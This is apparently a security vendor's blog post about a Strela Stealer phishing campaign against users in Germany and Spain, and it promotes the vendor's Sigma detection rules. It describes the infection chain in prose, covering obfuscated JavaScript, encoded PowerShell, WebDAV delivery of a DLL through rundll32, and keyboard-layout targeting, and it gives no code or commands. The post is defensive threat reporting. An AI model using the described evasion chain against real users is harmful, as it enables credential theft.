Stealthy Strela Stealer Detection: Info-Stealing Malware Resurfaces with Enhanced Capabilities to Target Central and Southwestern Europe
Table of contents:
Security researchers have revealed a stealthy campaign targeting users in Central and Southwestern Europe with an email credential stealer. Dubbed Strela, this evasive malware is deployed via phishing emails, utilizing obfuscated JavaScript and WebDAV to circumvent conventional security measures. Since its emergence two years ago, Strela Stealer has significantly enhanced its malicious capabilities, allowing it to fly under the radar while covertly stealing sensitive data from unsuspecting users.
Detect Stealthy Strela Stealer Attacks
According to IBM, phishing continues to be a predominant infection vector in 2024, accounting for over 40% of security incidents that leverage it as the initial access point. To stay on top of emerging threats and proactively withstand potential intrusions, such as Strela Stealer attacks, security professionals can rely on SOC Prime Platform for collective cyber defense serving a complete product suite for advanced threat detection and hunting.
Addressing the latest Strela Stealer campaign, SOC Prime Platform offers a set of curated Sigma rules to identify associated malicious activity at the earliest stages. Hit the Explore Detections button below and immediately drill down to relevant detection rules provided by the SOC Prime Team and our experienced Threat Bounty developer Davut Selcuk.
All detections are accompanied by extensive threat intelligence, attack timelines, and additional metadata. Moreover, all the rules are compatible with 30+ SIEM, EDR, XDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework.
Eager to contribute to collective cyber defense? Aspiring security professionals can sharpen their detection engineering & threat hunting skills by joining the crowdsourced Threat Bounty Program. Advance your career while enriching collective industry expertise and earning financial rewards for your input.
Strela Stealer Analysis
Cyble Research and Intelligence Labs have unveiled a covert phishing campaign primarily targeting Germany and Spain, which leverages obfuscated JavaScript and WebDAV to deliver a payload and steal sensitive user data. The final payload is a novel more advanced variation of Strela Stealer that bypasses security measures via obfuscated JavaScript and PowerShell commands. Apart from credential theft, Strela Stealer collects extensive system information, allowing attackers to perform reconnaissance and possibly initiate additional targeted activities on the compromised systems.
Strela Stealer, which has been active in the cyber threat arena since at least late 2022, is an infostealer specifically crafted to extract email account credentials from popular email clients. In their recent campaign, adversaries have evolved their tactics by employing spear-phishing emails containing ZIP files that house obfuscated JavaScript code designed to run via WScript. The infection chain starts with a fraudulent invoice notification for a recent transaction accompanied by a ZIP attachment containing a weaponized JavaScript file that leverages sophisticated obfuscation techniques. The latter runs a base64-encoded PowerShell command, which retrieves the final malicious DLL from a WebDAV server via the infamous “rundll32.exe” Microsoft-signed utility frequently weaponized by attackers. This technique prevents the malicious DLL file from being saved on the disk, enabling it to bypass security defenses. The infostealer continues execution if the process detects a language match through the GetKeyboardLayout API, which points to the specific malware targets related to Germany and Spain.
Potential mitigation measures to minimize the risk of Strela Stealer infections involve enforcing strict access controls on WebDAV servers and restricting the execution of PowerShell and other scripts on endpoints that do not require them for business operations.
As threat actors adopt more advanced variants of information-stealing malware that rely on intricate obfuscation and detection evasion techniques, it is imperative for defenders to bolster proactive security measures. By relying on SOC Prime’s complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection, security teams can proactively thwart attacks of any sophistication while reinforcing the organization’s cybersecurity posture.
